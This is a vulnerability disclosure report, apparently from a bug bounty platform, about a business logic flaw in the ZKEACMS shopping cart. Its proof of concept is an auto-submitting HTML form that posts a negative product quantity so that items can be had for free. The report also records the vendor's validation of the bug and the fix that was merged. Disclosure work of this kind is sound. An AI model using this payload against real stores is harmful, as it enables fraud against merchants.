Business Logic Errors in seriawei/zkeacms

Valid

Reported on

Jul 16th 2021


✍️ Description

ZKEACMS is vulnerable to Business Logic error through negative product amount.

🕵️‍♂️ Proof of Concept

PoC file content:

<form id="form" action="http://localhost:5000/Basket/Add" method="POST">
  <input id="product" type="text" name="productId" value="2">
  <input type="text" name="quantity" value="-1">
  <input type="submit">
</form>

<script>
  setTimeout(() => { form.submit() }, 2000);
</script>
  1. Save the above content into an HTML file.
  2. Open it on the browser. Check the shopping cart (negative value).

PoC video.

💥 Impact

Manipulate the total value, which is possible to get all products for free.

We have contacted a member of the seriawei/zkeacms team and are waiting to hear back 2 months ago
Wayne validated this vulnerability 2 months ago
Renan Rocha has been awarded the disclosure bounty
The fix bounty is now up for grabs
Wayne confirmed that a fix has been merged on 5c871c 2 months ago
Wayne has been awarded the fix bounty